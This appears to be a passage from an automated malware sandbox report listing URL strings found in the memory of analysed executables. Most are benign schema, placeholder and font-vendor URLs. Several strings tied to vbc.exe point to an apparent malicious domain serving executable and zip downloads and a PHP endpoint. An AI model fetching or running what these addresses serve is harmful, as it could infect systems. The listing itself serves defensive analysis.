Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D;
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/_z
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exeCCJ
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exeRC%
Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/wpiq.zip
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/wpiq.zipQQC:
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=60C
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6K
Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6h
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/z/
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597552021.0000000002B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.595445295.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Responsest(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Sy(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.596318872.0000000002B15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: 453D.exe.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 453D.exe.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 453D.exe.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: explorer.exe, 00000001.00000000.299404500.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286478895.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.276466462.000000000F276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.307788321.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257994552.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 816F.exe, 0000001A.00000003.486913781.00000000060F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: 816F.exe, 0000001A.00000003.484605971.00000000060F4000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.485467854.00000000060F4000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.485684143.00000000060F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comU
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coml1
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comol
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comt
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
